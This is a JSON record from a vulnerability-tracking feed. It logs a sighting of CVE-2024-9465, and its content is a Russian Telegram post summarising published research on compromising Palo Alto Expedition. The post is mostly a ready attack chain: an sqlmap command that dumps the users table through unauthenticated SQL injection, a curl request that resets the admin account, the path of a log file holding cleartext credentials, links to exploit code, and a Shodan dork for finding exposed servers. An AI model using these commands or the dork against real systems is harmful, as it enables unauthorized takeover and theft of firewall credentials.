{"uuid": "1f236e20-ae8f-42c5-9c2b-c8e40f37d181", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9465", "type": "seen", "source": "https://t.me/securixy_kz/1019", "content": "\"\u041f\u043e\u043b\u0443\u043f\u0430\u043b\u044c\u0442\u043e\" \u0438\u0445 \u0431\u0438\u043d \u0431\u043e\u043b\u044c\u043d\u043e\u0439 \u0441\u043e\u0432\u0441\u0435\u043c \u0438\u043b\u0438 Palo Alto \u0438\u0437 N-Day \u0434\u043e \u043f\u043e\u043b\u043d\u043e\u0439 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438\n\n[**CVE-2024-9465: Palo Alto Expedition Unauthenticated SQL Injection**](https://github.com/horizon3ai/CVE-2024-9465)\n\n\u0421\u043a\u0443\u043b\u044c\u043c\u0430\u043f\u043e\u043c \u0442\u0430\u0449\u0438\u043c \u0442\u0430\u0431\u043b\u0438\u0446\u0443 \u044e\u0437\u0435\u0440\u043e\u0432:\n\n\npython3 sqlmap.py -u \"https://10.0.40.64/bin/configurations/parsers/Checkpoint/CHECKPOINT.php?action=im port&amp;type=test&amp;project=pandbRBAC&amp;signatureid=1\" -p signatureid -T users --dump\n\n\nCVE-2024-5910: \u041e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0437\u0430\u0445\u0432\u0430\u0442\u0443 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438, \u0438\u043c\u0435\u044e\u0449\u0438\u043c\u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0435\u0442\u0438\n\n\ncurl -k 'https://10.0.40.64/0S/startup/restore/restoreAdmin.php'\n\n\n[**CVE-2024-9464: Palo Alto Expedition Authenticated Command Injection Exploit**](https://github.com/horizon3ai/CVE-2024-9464)\n\nCVE-2024-9466: Cleartext Credentials in Logs\n\n/home/userSpace/devices/debug.txt\n\n\u0421\u0435\u0440\u0432\u0435\u0440 Expedition \u0445\u0440\u0430\u043d\u0438\u0442 \u0442\u043e\u043b\u044c\u043a\u043e API-\u043a\u043b\u044e\u0447\u0438 \u0438 \u043d\u0435 \u0434\u043e\u043b\u0436\u0435\u043d \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0442\u044c \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435, \u043d\u043e \u0432 \u044d\u0442\u043e\u043c \u0444\u0430\u0439\u043b\u0435 \u0436\u0443\u0440\u043d\u0430\u043b\u0430 \u0431\u044b\u043b\u0438 \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u044b \u0432\u0441\u0435 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435. \u041e\u0431 \u044d\u0442\u043e\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435 \u0431\u044b\u043b\u043e \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u043e, \u0438 \u0435\u0439 \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d \u043d\u043e\u043c\u0435\u0440 CVE-2024-9466.\n\nBlog: https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/\n\nShodan dork:\n\n\nhtml:\"Expedition Project\"\n\n\nSource: https://t.me/P0x3k/1966", "creation_timestamp": "2026-07-13T00:00:34.275828Z"}